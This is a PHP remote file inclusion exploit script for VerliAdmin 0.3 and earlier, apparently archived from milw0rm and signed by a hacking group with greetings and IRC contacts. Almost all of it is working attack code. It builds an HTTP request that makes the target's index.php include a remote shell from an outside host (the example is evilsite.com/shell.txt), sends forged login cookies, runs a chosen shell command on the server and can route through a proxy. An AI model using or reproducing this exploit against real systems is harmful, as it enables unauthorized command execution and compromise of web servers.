VerliAdmin <= 0.3 (index.php) Remote File Include Exploit DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam <======== ========> http://www.rahim.webd.pl/ <======== Contact: kacper1964@yahoo.pl (c)od3d by Kacper -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Greetings DragonHeart and all DEVIL TEAM Patriots :) - Leito & Leon | friend str0ke ;) Blund Coder, D0han, d3m0n, D3m0n (ziom z Niemiec :P), dn0de, DUREK5, fdj, Grzegorz, GrZyB997, konsol, Mandr4ke, mass, michalind, mIvus, Nua, nukedclx, pepi, QunZ, Qw3rty, RebeL, SkD, Adam, arkadius, asteroid, blue, Ci2u, CrazzyIwan, DMX, drzewko, ExTrEmE][-][ack, Gelo, Kicaj, Larry, Leito, LEON, Michas, Morpheus, MXZ, Ramzes, redsaq, TomZen and Dr Max Virus TamTurk, hackersecurity.org -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Greetings for 4ll Fusi0n Group members ;-) and all members of hacker.com.pl ;) -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- '; if ($argc<6) { print (' -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Usage: php '.$argv[0].' host shell nick pass cmd OPTIONS host: script server (ip/hostname) shell: path to shell nick: You username in hub pass: You username password cmd: a shell command (ls -la) Options: -p[port]: specify a port other than 80 -P[ip:port]: specify a proxy Example: php '.$argv[0].' localhost http://www.evilsite.com/shell.txt Hauru zamek ls -la -P1.1.1.1:80 shell.txt: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- '); die; } error_reporting(0); ini_set(`max_execution_time`,0); ini_set(`default_socket_timeout`,5); function quick_dump($string) { $result='';$exa='';$cont=0; for ($i=0; $i<=strlen($string)-1; $i++) { if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 )) {$result.=` .`;} else {$result.=` `.$string[$i];} if (strlen(dechex(ord($string[$i])))==2) {$exa.=` `.dechex(ord($string[$i]));} else {$exa.=` 0`.dechex(ord($string[$i]));} $cont++;if ($cont==15) {$cont=0; $result.=`\r\n`; $exa.=`\r\n`;} } return $exa.`\r\n`.$result; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; function sendpackets($packet) { global $proxy, $host, $port, $html, $proxy_regex; if ($proxy=='') { $ock=fsockopen(gethostbyname($host),$port); if (!$ock) { echo 'No response from '.$host.':'.$port; die; } } else { $c = preg_match($proxy_regex,$proxy); if (!$c) { echo 'Not a valid proxy...';die; } $parts=explode(':',$proxy); echo `Connecting to `.$parts[0].`:`.$parts[1].` proxy...\r\n`; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...';die; } } fputs($ock,$packet); if ($proxy=='') { $html=''; while (!feof($ock)) { $html.=fgets($ock); } } else { $html=''; while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { $html.=fread($ock,1); } } fclose($ock); #debug #echo `\r\n`.$html; } function make_seed() { list($usec, $sec) = explode(' ', microtime()); return (float) $sec + ((float) $usec * 100000); } $host=$argv[1]; $shell=$argv[2]; $nick=$argv[3]; $password=$argv[4]; $cmd=``; $port=80; $proxy=``; for ($i=5; $i<$argc; $i++){ $temp=$argv[$i][0].$argv[$i][1]; if (($temp<>`-p`) and ($temp<>`-P`)) {$cmd.=` `.$argv[$i];} if ($temp==`-p`) { $port=str_replace(`-p`,``,$argv[$i]); } if ($temp==`-P`) { $proxy=str_replace(`-P`,``,$argv[$i]); } } if ($proxy=='') {$p='http://'.$host.':'.$port;} $num1 = Rand(97, 122); $num2 = Rand(65, 90); $pass = Crypt($password, Chr($num1).Chr($num2)); $packet =`GET `.$p.`index.php?q=`.$shell.`?cmd=`.$cmd.`%00 HTTP/1.0\r\n`; $pakiet.=`Cookie: brwsr_tp=Opera;\r\n`; $pakiet.=`Cookie: lang=pl;\r\n`; $pakiet.=`Cookie: login=1;\r\n`; $pakiet.=`Cookie: nick=`.$nick.`;\r\n`; $pakiet.=`Cookie: password=`.$pass.`;\r\n`; $packet.=`Host: `.$host.`\r\n`; $packet.=`Connection: Close\r\n\r\n`; sendpackets($packet); if (strstr($html,`hauru`)) { $temp=explode(`hauru`,$html); die($temp[1]); } echo `Exploit err0r :(\n`; echo `Go to DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam\n`; ?> # milw0rm.com [2006-12-18]